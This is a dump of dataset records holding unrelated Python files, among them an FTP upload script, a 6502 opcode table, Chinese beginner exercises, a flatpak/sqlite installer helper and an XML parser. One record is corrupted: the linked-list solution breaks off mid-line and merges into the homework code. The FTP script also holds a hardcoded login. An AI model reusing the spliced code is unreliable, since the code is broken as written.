machine?\"\"\"\n    return ip in LOCAL_IPS\n\n@_requires_ips\ndef is_public_ip(ip):\n    \"\"\"is `ip` a publicly visible address?\"\"\"\n    return ip in PUBLIC_IPS\n","sub_path":"IPython/utils/localinterfaces.py","file_name":"localinterfaces.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"625726286","text":"import ftplib\r\nimport os\r\nimport time\r\n\r\nfilename = \"curCam.mp4\"\r\nftp = ftplib.FTP()\r\n\r\nftp.connect(\"127.0.0.1\", 21)\r\nftp.login(\"CPTV_admin\", \"2204\")\r\nftp.cwd(\"./\")\r\n\r\nmyfile = open(filename, 'rb')\r\nftp.storbinary('STOR ' + filename, myfile)\r\nnewFileName = str(time.time()) + '_.mp4'\r\nftp.rename(filename, newFileName)\r\n\r\nmyfile.close()\r\nftp.close()","sub_path":"shKIM_CPTV_module/moduleTest/ftpCli.py","file_name":"ftpCli.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73566474","text":"'''Reverse a linked list from position m to n. Do the reversal in a single pass.\n\nNote:\n1 ≤ m ≤ n ≤ length of the list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL, m = 2, n = 4\nOutput: 1->4->3->2->5->NULL'''\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution(object):\n    def reverseBetween(self, head, m, n):\n        \"\"\"\n        :type head: ListNode\n        :type m: int\n        :type n: int\n        :rtype: ListNode\n        \"\"\"\n        first=ListNode(0)\n        first.next=head\n        position=1\n\n        # pLast=ListNode(None)\n        # pBegin=ListNode(None)\n\n        while head.next:\n            if position 66:\n        v = li[i]\n        l.append(v)\n    elif li[i] < 66:\n        v1 = li[i]\n        L.append(v1)\n    else:\n        pass\ndic.update({'k1': l, 'k2': L})\nprint(dic)\n\n\n# 2. Searching\n# Strip the spaces from every element of the list, then find all elements that start with a or A and end with c.\nli = [\"alec\", \" aric\", \"Alex\", \"Tony\", \"rain\"]\ntu = (\"alec\", \" aric\", \"Alex\", \"Tony\", \"rain\")\ndic = {'k1': \"alex\", 'k2': \"aric\", \"k3\": \"Alex\", \"k4\": \"Tony\"}\nfor i in li:\n# for the tuple swap li for tu, for the dict swap li for dic.values(); everything else stays the same\n    v = i.strip()\n    v1 = v.startswith('a')\n    v2 = v.startswith('A')\n    v3 = v.endswith('c')\n    if (v1 or v2) and v3: # 'or' binds looser than 'and', so the unparenthesized original matched every name starting with 'a'\n        print(v)\n    else:\n        pass\n\n\n\n# 3. Print the product list, let the user enter an index, and show the chosen product\nli = [\"phone\", \"computer\", 'mouse pad', 'yacht']\nfor i,j in enumerate(li,0):\n    print(i,j)\ns = input('Enter an index: ')\nv = int(s) % 4\nprint(li[v])\n
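\n# (added note) using the length of the list instead of the hard-coded 4 keeps the\n# modulo lookup in range even if the product list changes, e.g. v = int(s) % len(li)\n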
print(\"输入错误。。。。。\")\n else:\n print(iphone_list, count, '可以购买')\n\nprint('购买的商品', iphone_list, '\\n商品总价', count, '\\n账户总额', s)\n\n\n\n\n\n#五:九九乘法表\nfor i in range(1, 10):\n s = ''\n for j in range(1, i+1):\n s += str(i)+'*'+str(j)+\"=\"+str(i*j)+'\\t'\n print(s)\n\n\ns = ''\nfor i in range(1, 10):\n for j in range(1, i+1):\n s = str(i) + '*' + str(j) + \"=\" + str(i * j) + '\\t'\n print(s, end='')\n print()\n\n#六:用下划线将列表的每一个元素拼接\nli = ['alex','eric',123]\nli[2]=str(li[2])\nprint('_'.join(li))\n\n\n#七:写代码,如下元祖,按要求实现每一个功能\ntu = ('alex','eric','ranin')\n#a:计算元祖长度并输出\nprint(len(tu))\n#b:获取元祖的第2个元素并输出\nprint(tu[2])\n#c:获取元祖的第1—2个元素,并输出\nprint(tu[1:90])\n#d:请使用for输出元祖的元素\nfor i in tu:\n print(i)\n#e:请使用for,len,range输出元祖的索引\nfor j in range(0,len(tu)):\n print(j)\n#f:请使用enumerate输出元祖元素和序号(序号从10开始)\nfor i, j in enumerate(tu,10):\n print(i, j)\n\n\n\n#八:有如下变量,请实现要求的功能\ntu = ('alex',[11,22,{'k1':'v1','k2':['age','name'],'k3':(11,22,33)}],44)\n#a:讲述元祖的特性\n\"\"\"\n1;有序性\n2:一级元素不可被修改,删除\n\"\"\"\n#b:请问tu变量中的第一个元素'alex'是否可以被修改————》不可以\n#c:k️2对应的值是列表,可以,\ntu[1][2]['k2'].append('seven')\nprint(tu)\n#d:k3对应的是元祖,不可以\n\n\n\n#九:字典\ndic = {'k1': 'v1', 'k2': 'v2', 'k3': [11, 22, 33]}\n#请循环输出所有的key\nfor i in dic:\n print(i)\nfor i in dic.keys():\n print(i)\n#输出所有的value\nfor i in dic.values():\n print(i)\n#输出所有的key和value\nfor i in dic.items():\n print(i)\nfor i in dic:\n print(i, dic[i])\n#添加'k4':'v4'在词典最后\ndic.update({'k4': 'v4'})\nprint(dic)\n#修改k1对应的值为alex\ndic.update({'k1': 'alex'})\nprint(dic)\n#在k3后追加一个元素44\ndic['k3'].append(44)\nprint(dic)\n#在k3对应的值的第 1 个位置插入个元素18\ndic['k3'].insert(1, 18)\nprint(dic)\n\n\n\n\n# 十:转换\n# a:将字符串s='alex'转换成列表\ns = 'alex'\nv = list(s)\nprint(v)\n#b:将字符串s='alex'转换成元祖\ns = 'alex'\nv = tuple(s)\nprint(v)\n\n\n\n\n# 十一:列举布尔值是False的所有值\n# 一共有七个 {} () [] None 0 '' False\n\n\n\n\n# 十二:分页显示内容\n# a:通过for循环创建301条数据,数据类型不限制\n# b:分页,每页显示十条内容\n# li = []\n# for i in range(1, 302):\n# s = 'alex'+'_'+str(i)+'\\t''alex@live.com'+'_'+str(i)+'\\t''pwd' + '_' + str(i)\n# li.append(s)\n# print(s.expandtabs(20))\n# v = input('请输入页码:')\n# v = int(v)\n# start = (v - 1) * 10\n# end = v * 10\n# for i in li[start:end]:\n# print(i)\n\nli = []\nfor i in range(1, 302):\n s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format(add=str(i))\n # s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format(**{'add': str(i)})\n # s = \"alex_{add}\\talex@live.com_{add}\\tpwd_{add}\".format_map({'add': str(i)})\n li.append(s)\n print(s.expandtabs(20))\nv = input('请输入页码:')\nv = int(v)\nstart = (v - 1) * 10\nend = v * 10\nfor i in li[start:end]:\n print(i)\n\n\n\n#十三:有1,2,3,4,5,6,7,8个数字,能组成多少个互不相同的两位数\ncount = 0\nfor i in range(1, 9):\n for j in range(1, 9):\n if i != j:\n count += 1\nprint(count)\n\n\n\n\n# 十四:有一个列表,求出相加为9对应的元素\n# 对应的索引\nnums = [2, 7, 11, 15, 1, 8, 7]\nfor i in range(len(nums)):\n for j in range(len(nums)):\n if nums[i]+nums[j] == 9 and i != j:\n print(i, j)\n# 对应的元素\nnums = [2, 7, 11, 15, 1, 8, 7]\nfor i in nums:\n for j in nums:\n if i + j == 9 and i != j:\n print(i, j)\n\n\n\n# 十五:公鸡5文钱一只,母鸡3文钱一只,小鸡3只1文钱;用100文钱买100只鸡的组合\nfor i in range(1,100//5):\n for j in range(1,100//3):\n for z in range(1,99):\n if i+j+z == 100 and 5*i+3*j+z/3 == 100:\n print('购买公鸡数', i, '购买母鸡数', j, '购买小鸡数', z, sep=':')\n","sub_path":"code/Day13_homewo/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":7554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266591347","text":"from cpu import AddressingMode\n\n\nclass OpCode:\n def __init__(self,\n 
code: 'u8',\n mnemonic: \"&'static str\",\n len: 'u8',\n cycles: 'u8',\n mode: 'AddressingMode'):\n self.code = code\n self.mnemonic = mnemonic\n self.len = len\n self.cycles = cycles\n self.mode = mode\n\n\nCPU_OPS_CODES = [\n OpCode(0x00, 'BRK', 1, 7, AddressingMode.NoneAddressing),\n OpCode(0xea, 'NOP', 1, 2, AddressingMode.NoneAddressing),\n\n # --- Arithmetic\n OpCode(0x69, 'ADC', 2, 2, AddressingMode.Immediate),\n OpCode(0x65, 'ADC', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x75, 'ADC', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x6d, 'ADC', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x7d, 'ADC', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x79, 'ADC', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x61, 'ADC', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x71, 'ADC', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0xe9, 'SBC', 2, 2, AddressingMode.Immediate),\n OpCode(0xe5, 'SBC', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xf5, 'SBC', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0xed, 'SBC', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xfd, 'SBC', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0xf9, 'SBC', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0xe1, 'SBC', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0xf1, 'SBC', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0x29, 'AND', 2, 2, AddressingMode.Immediate),\n OpCode(0x25, 'AND', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x35, 'AND', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x2d, 'AND', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x3d, 'AND', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x39, 'AND', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x21, 'AND', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x31, 'AND', 2, 5, AddressingMode.Indirect_Y),\n # ---\n # /*+1 if page crossed*/\n OpCode(0x49, 'EOR', 2, 2, AddressingMode.Immediate),\n OpCode(0x45, 'EOR', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x55, 'EOR', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x4d, 'EOR', 3, 4, AddressingMode.Absolute),\n OpCode(0x5d, 'EOR', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x59, 'EOR', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x41, 'EOR', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x51, 'EOR', 2, 5, AddressingMode.Indirect_Y),\n\n # ---\n OpCode(0x09, 'ORA', 2, 2, AddressingMode.Immediate),\n OpCode(0x05, 'ORA', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x15, 'ORA', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x0d, 'ORA', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0x1d, 'ORA', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0x19, 'ORA', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0x01, 'ORA', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0x11, 'ORA', 2, 5, AddressingMode.Indirect_Y),\n\n # --- Shifts\n OpCode(0x0a, 'ASL', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x06, 'ASL', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x16, 'ASL', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x0e, 'ASL', 3, 6, AddressingMode.Absolute),\n OpCode(0x1e, 'ASL', 3, 7, AddressingMode.Absolute_X),\n # ---\n OpCode(0x4a, 'LSR', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x46, 'LSR', 2, 5, AddressingMode.ZeroPage),\n OpCode(0x56, 'LSR', 2, 6, AddressingMode.ZeroPage_X),\n OpCode(0x4e, 'LSR', 3, 6, AddressingMode.Absolute),\n 
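# (added note) read-modify-write forms like the absolute,X LSR below always take\n    # the full worst-case cycle count; the /*+1 if page crossed*/ adjustment never applies to them.\n    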
OpCode(0x5e, 'LSR', 3, 7, AddressingMode.Absolute_X),\n    # ---\n    OpCode(0x2a, 'ROL', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x26, 'ROL', 2, 5, AddressingMode.ZeroPage),\n    OpCode(0x36, 'ROL', 2, 6, AddressingMode.ZeroPage_X),\n    OpCode(0x2e, 'ROL', 3, 6, AddressingMode.Absolute),\n    OpCode(0x3e, 'ROL', 3, 7, AddressingMode.Absolute_X),\n    # ---\n    OpCode(0x6a, 'ROR', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x66, 'ROR', 2, 5, AddressingMode.ZeroPage),\n    OpCode(0x76, 'ROR', 2, 6, AddressingMode.ZeroPage_X),\n    OpCode(0x6e, 'ROR', 3, 6, AddressingMode.Absolute),\n    OpCode(0x7e, 'ROR', 3, 7, AddressingMode.Absolute_X),\n    # ---\n    OpCode(0xe6, 'INC', 2, 5, AddressingMode.ZeroPage),\n    OpCode(0xf6, 'INC', 2, 6, AddressingMode.ZeroPage_X),\n    OpCode(0xee, 'INC', 3, 6, AddressingMode.Absolute),\n    OpCode(0xfe, 'INC', 3, 7, AddressingMode.Absolute_X),\n    # ---\n    OpCode(0xe8, 'INX', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0xc8, 'INY', 1, 2, AddressingMode.NoneAddressing),\n    # ---\n    OpCode(0xc6, 'DEC', 2, 5, AddressingMode.ZeroPage),\n    OpCode(0xd6, 'DEC', 2, 6, AddressingMode.ZeroPage_X),\n    OpCode(0xce, 'DEC', 3, 6, AddressingMode.Absolute),\n    OpCode(0xde, 'DEC', 3, 7, AddressingMode.Absolute_X),\n    # ---\n    OpCode(0xca, 'DEX', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x88, 'DEY', 1, 2, AddressingMode.NoneAddressing),\n    # ---\n    OpCode(0xc9, 'CMP', 2, 2, AddressingMode.Immediate),\n    OpCode(0xc5, 'CMP', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xd5, 'CMP', 2, 4, AddressingMode.ZeroPage_X),\n    OpCode(0xcd, 'CMP', 3, 4, AddressingMode.Absolute),\n    # /*+1 if page crossed*/\n    OpCode(0xdd, 'CMP', 3, 4, AddressingMode.Absolute_X),\n    # /*+1 if page crossed*/\n    OpCode(0xd9, 'CMP', 3, 4, AddressingMode.Absolute_Y),\n    OpCode(0xc1, 'CMP', 2, 6, AddressingMode.Indirect_X),\n    # /*+1 if page crossed*/\n    OpCode(0xd1, 'CMP', 2, 5, AddressingMode.Indirect_Y),\n    # ---\n    OpCode(0xc0, 'CPY', 2, 2, AddressingMode.Immediate),\n    OpCode(0xc4, 'CPY', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xcc, 'CPY', 3, 4, AddressingMode.Absolute),\n    # ---\n    OpCode(0xe0, 'CPX', 2, 2, AddressingMode.Immediate),\n    OpCode(0xe4, 'CPX', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xec, 'CPX', 3, 4, AddressingMode.Absolute),\n\n    # --- Branching\n    # //AddressingMode that acts as Immediate\n    OpCode(0x4c, 'JMP', 3, 3, AddressingMode.NoneAddressing),\n    # //AddressingMode:Indirect with 6502 bug\n    OpCode(0x6c, 'JMP', 3, 5, AddressingMode.NoneAddressing),\n    OpCode(0x20, 'JSR', 3, 6, AddressingMode.NoneAddressing),\n    OpCode(0x60, 'RTS', 1, 6, AddressingMode.NoneAddressing),\n    OpCode(0x40, 'RTI', 1, 6, AddressingMode.NoneAddressing),\n    # ---\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0xd0, 'BNE', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0x70, 'BVS', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0x50, 'BVC', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0x30, 'BMI', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0xf0, 'BEQ', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0xb0, 'BCS', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0x90, 'BCC', 2, 2, AddressingMode.NoneAddressing),\n    # /*(+1 if branch succeeds +2 if to a new page)*/\n    OpCode(0x10, 'BPL', 2, 2, AddressingMode.NoneAddressing),\n    # ---\n    OpCode(0x24, 
'BIT', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0x2c, 'BIT', 3, 4, AddressingMode.Absolute),\n\n    # --- Stores, Loads\n    OpCode(0xa9, 'LDA', 2, 2, AddressingMode.Immediate),\n    OpCode(0xa5, 'LDA', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xb5, 'LDA', 2, 4, AddressingMode.ZeroPage_X),\n    OpCode(0xad, 'LDA', 3, 4, AddressingMode.Absolute),\n    # /*+1 if page crossed*/\n    OpCode(0xbd, 'LDA', 3, 4, AddressingMode.Absolute_X),\n    # /*+1 if page crossed*/\n    OpCode(0xb9, 'LDA', 3, 4, AddressingMode.Absolute_Y),\n    OpCode(0xa1, 'LDA', 2, 6, AddressingMode.Indirect_X),\n    # /*+1 if page crossed*/\n    OpCode(0xb1, 'LDA', 2, 5, AddressingMode.Indirect_Y),\n    # ---\n    OpCode(0xa2, 'LDX', 2, 2, AddressingMode.Immediate),\n    OpCode(0xa6, 'LDX', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xb6, 'LDX', 2, 4, AddressingMode.ZeroPage_Y),\n    OpCode(0xae, 'LDX', 3, 4, AddressingMode.Absolute),\n    # /*+1 if page crossed*/\n    OpCode(0xbe, 'LDX', 3, 4, AddressingMode.Absolute_Y),\n    # ---\n    OpCode(0xa0, 'LDY', 2, 2, AddressingMode.Immediate),\n    OpCode(0xa4, 'LDY', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0xb4, 'LDY', 2, 4, AddressingMode.ZeroPage_X),\n    OpCode(0xac, 'LDY', 3, 4, AddressingMode.Absolute),\n    # /*+1 if page crossed*/\n    OpCode(0xbc, 'LDY', 3, 4, AddressingMode.Absolute_X),\n\n    # ---\n    OpCode(0x85, 'STA', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0x95, 'STA', 2, 4, AddressingMode.ZeroPage_X),\n    OpCode(0x8d, 'STA', 3, 4, AddressingMode.Absolute),\n    OpCode(0x9d, 'STA', 3, 5, AddressingMode.Absolute_X),\n    OpCode(0x99, 'STA', 3, 5, AddressingMode.Absolute_Y),\n    OpCode(0x81, 'STA', 2, 6, AddressingMode.Indirect_X),\n    OpCode(0x91, 'STA', 2, 6, AddressingMode.Indirect_Y),\n    # ---\n    OpCode(0x86, 'STX', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0x96, 'STX', 2, 4, AddressingMode.ZeroPage_Y),\n    OpCode(0x8e, 'STX', 3, 4, AddressingMode.Absolute),\n    # ---\n    OpCode(0x84, 'STY', 2, 3, AddressingMode.ZeroPage),\n    OpCode(0x94, 'STY', 2, 4, AddressingMode.ZeroPage_X),\n    OpCode(0x8c, 'STY', 3, 4, AddressingMode.Absolute),\n\n    # --- Flags clear\n    OpCode(0xD8, 'CLD', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x58, 'CLI', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0xb8, 'CLV', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x18, 'CLC', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x38, 'SEC', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x78, 'SEI', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0xf8, 'SED', 1, 2, AddressingMode.NoneAddressing),\n    # ---\n    OpCode(0xaa, 'TAX', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0xa8, 'TAY', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0xba, 'TSX', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x8a, 'TXA', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x9a, 'TXS', 1, 2, AddressingMode.NoneAddressing),\n    OpCode(0x98, 'TYA', 1, 2, AddressingMode.NoneAddressing),\n\n    # --- Stack\n    OpCode(0x48, 'PHA', 1, 3, AddressingMode.NoneAddressing),\n    OpCode(0x68, 'PLA', 1, 4, AddressingMode.NoneAddressing),\n    OpCode(0x08, 'PHP', 1, 3, AddressingMode.NoneAddressing),\n    OpCode(0x28, 'PLP', 1, 4, AddressingMode.NoneAddressing),\n]\n\nOPCODES_MAP = {}\nfor cpuop in CPU_OPS_CODES:\n    OPCODES_MAP.update({cpuop.code: cpuop})\n\nif __name__ == '__main__':\n    pass\n\n","sub_path":"ch5/src/opcodes.py","file_name":"opcodes.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95217627","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\n\n\ndef installationflatpak():\n    ''' Install software through flatpak '''\n    liste_flatpak = [\n        \"com.slack.Slack\",\n        \"com.spotify.Client\",\n        \"org.signal.Signal\",\n        \"org.telegram.desktop\",\n        \"com.discordapp.Discord\",\n        \"io.dbeaver.DBeaverCommunity\"\n    ]\n    for i in liste_flatpak:\n        os.system(\"flatpak install flathub \" + i) # the trailing space keeps the remote name and the app id from running together\n
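\n# (added note) os.system returns the shell's exit status; a non-zero value means the\n# install failed, so a caller could report it, e.g. (app_id is a hypothetical name):\n#     if os.system(\"flatpak install -y flathub \" + app_id) != 0:\n#         print(\"installation failed for\", app_id)\n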
\n\ndef installbase(installcmd):\n    ''' Install the base set of software '''\n    conn = sqlite3.connect('db.sqlite')\n    cursor = conn.cursor()\n    sqlrequest = 'SELECT * FROM Software ORDER BY Logiciel'\n\n    for row in cursor.execute(sqlrequest):\n        os.system(installcmd + \" \" + row[0])\n\n\ndef ajouteindb(soft):\n    '''Add a piece of software to the db'''\n\n    conn = sqlite3.connect('db.sqlite')\n    cursor = conn.cursor()\n    cursor.execute(\"\"\"INSERT INTO Software(Logiciel) VALUES(?);\"\"\", (soft,))\n    conn.commit()\n    cursor.close()\n\n\ndef supprimer(logiciel):\n    '''Remove a piece of software from the database'''\n    conn = sqlite3.connect(\"db.sqlite\")\n    cursor = conn.cursor()\n    sqlrequest = \"DELETE FROM Software WHERE Logiciel = ?\"\n    cursor.execute(sqlrequest, (logiciel,))\n    conn.commit()\n    conn.close()\n\n\ndef creadb():\n    '''Create the database with its tables and columns'''\n    conn = sqlite3.connect('db.sqlite')\n    cursor = conn.cursor()\n    cursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS Software(\n    Logiciel TEXT)\n\"\"\")\n\n    conn.commit()\n    conn.close()\n\n\ndef showcontent():\n    \"\"\"Print everything that is in the database\"\"\"\n    conn = sqlite3.connect('db.sqlite')\n    cursor = conn.cursor()\n    sqlrequest = \"SELECT * FROM Software ORDER BY Logiciel\"\n    for row in cursor.execute(sqlrequest):\n        print(row)\n\n\ndef install_zsh():\n    os.system(\"./install_zsh\")\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543678587","text":"\"\"\" xml_util.py -- XML utility functions \"\"\"\nfrom xml.etree import ElementTree as ET\n\nfrom ascii import *\nfrom tl_logger import TLLog\n\nlog = TLLog.getLogger(\"xml_util\")\n\n\ndef boolValue(data):\n    \"\"\" if the input string is 'on', 'true', 'yes' or a non-zero number then return True \"\"\"\n    b = False\n    if data is not None:\n        if data.isdigit():\n            i = int(data)\n            if i != 0:\n                b = True\n        else:\n            data = data.lower()\n            if data in [\"yes\", \"true\", \"on\"]:\n                b = True\n    return b\n\n\nclass XMLReceiveQueue:\n    \"\"\" Process all XML messages.
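\n\n    Feed raw bytes in through processData(); once a complete element whose tag is\n    listed in lstCompTags has been closed, parseXMLMessage() is called with the\n    accumulated XML text (overload parseXMLMessage to consume each message).\n    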
\"\"\"\n\n def __init__(self, lstTags):\n self.lstCompTags = lstTags\n if len(self.lstCompTags) == 0:\n log.error(\n \"XMLReceiveQueue lstCompTags is empty -- NO XML ELEMENTS WILL BE PROCESSED\"\n )\n self.xmlData = \"\"\n self.stkTags = []\n self.stateFunc = self._waitForFirstStartTag\n\n def parseXMLMessage(self, xmlData):\n \"\"\" overload to convert completed XML message into specific object for queue \"\"\"\n log.error(\"parseXMLMessage() not overloaded -- ALL XML DATA IS IGNORED\")\n\n def processData(self, binData):\n \"\"\" process the received data \"\"\"\n log.debug(\"processData - binData size=%d\" % len(binData))\n for ch in binData:\n self.stateFunc(ch)\n\n def _waitForFirstStartTag(self, ch):\n log.debug(\"_waitForFirstStartTag() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n if ch == \"<\":\n self.stateFunc = self._waitForStartTagName\n self.xmlData = ch\n\n def _waitForStartTag(self, ch):\n log.debug(\"_waitForStartTag() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \"<\":\n self.stateFunc = self._waitForStartTagName\n\n def _waitForStartTagName(self, ch):\n log.debug(\"_waitForStartTagName() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isalpha(ch):\n self.stateFunc = self._waitForStartTagNameFinish\n self.startTag = ch\n elif ch == \"/\":\n self.stateFunc = self._waitForEndTagName\n\n def _waitForStartTagNameFinish(self, ch):\n log.debug(\"_waitForStartTagNameFinish() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isspace(ch):\n self.stateFunc = self._waitForStartTagClose\n elif ch == \">\":\n log.debug(\"startTag:%s\" % self.startTag)\n self.stkTags.append(self.startTag)\n self.stateFunc = self._waitForStartTag\n else:\n self.startTag += ch\n\n def _waitForStartTagClose(self, ch):\n log.debug(\"_waitForStartTagClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \">\":\n if self.xmlData[-2] == \"/\":\n log.debug(\"startTag / close:%s\" % self.startTag)\n if self.startTag in self.lstCompTags:\n self._completeXML()\n else:\n log.debug(\"startTag:%s\" % self.startTag)\n self.stkTags.append(self.startTag)\n self.stateFunc = self._waitForStartTag\n\n def _waitForEndTagClose(self, ch):\n log.debug(\"_waitForEndTagClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \"/\":\n self.stateFunc = self._waitForEndTagName\n elif not isspace(ch):\n self.stateFunc = self._waitForEndTag\n\n def _waitForEndTagName(self, ch):\n log.debug(\"_waitForEndTagName() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isalpha(ch):\n self.stateFunc = self._waitForEndTagNameFinish\n self.endTag = ch\n\n def _waitForEndTagNameFinish(self, ch):\n log.debug(\"_waitForEndTagNameFinish() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isspace(ch) or ch == \">\":\n log.debug(\"endTag:%s pop:%s\" % (self.endTag, self.stkTags.pop()))\n if ch == \">\":\n self.stateFunc = self._waitForStartTag\n if self.endTag in self.lstCompTags:\n self._completeXML()\n else:\n self.stateFunc = self._waitForEndTagClose\n else:\n self.endTag += ch\n\n def _waitForEndTagNameClose(self, ch):\n log.debug(\"_waitForEndTagNameClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \">\":\n self.stateFunc = self._waitForStartTag\n if self.endTag in self.lstCompTags:\n self._completeXML()\n\n def _completeXML(self):\n log.debug(\"_completeXML() XML={%s}\" % self.xmlData)\n self.parseXMLMessage(self.xmlData)\n self.xmlData = \"\"\n self.stateFunc = self._waitForFirstStartTag\n\n\nclass BaseXML:\n \"\"\" base 
class for XML objects \"\"\"\n\n    def __init__(self, tagName, dctEle=None, dctXML=None, xmlData=None):\n        self.tagName = tagName\n        self.xmlData = xmlData\n        self.dctEle = {}\n        self.dctXML = {}\n        if dctEle is not None:\n            self.dctEle = dctEle\n        if dctXML is not None:\n            self.dctXML = dctXML\n        self.initialize()\n\n    def initialize(self):\n        if self.dctEle:\n            for element in self.dctEle.keys():\n                setattr(self, element, None)\n\n    def parseXML(self, eleRoot):\n        for ele in eleRoot:\n            if self.dctEle and ele.tag in self.dctEle:\n                setattr(self, ele.tag, self.dctEle[ele.tag](ele.text))\n            elif self.dctXML and ele.tag in self.dctXML:\n                eventFunc = self.dctXML[ele.tag]\n                if eventFunc is None:\n                    x = ele.tag\n                else:\n                    x = eventFunc()\n                    x.parseXML(ele)\n                setattr(self, ele.tag, x)\n\n    def toXMLString(self):\n        s = \"<%s>\" % self.tagName\n        for element in self.dctEle.keys():\n            value = getattr(self, element)\n            if value is not None:\n                s += \"<%s>%s</%s>\" % (element, value, element)\n        for element in self.dctXML.keys():\n            if hasattr(self, element):\n                value = getattr(self, element)\n                if value is not None:\n                    s += value.toXMLString()\n        s += 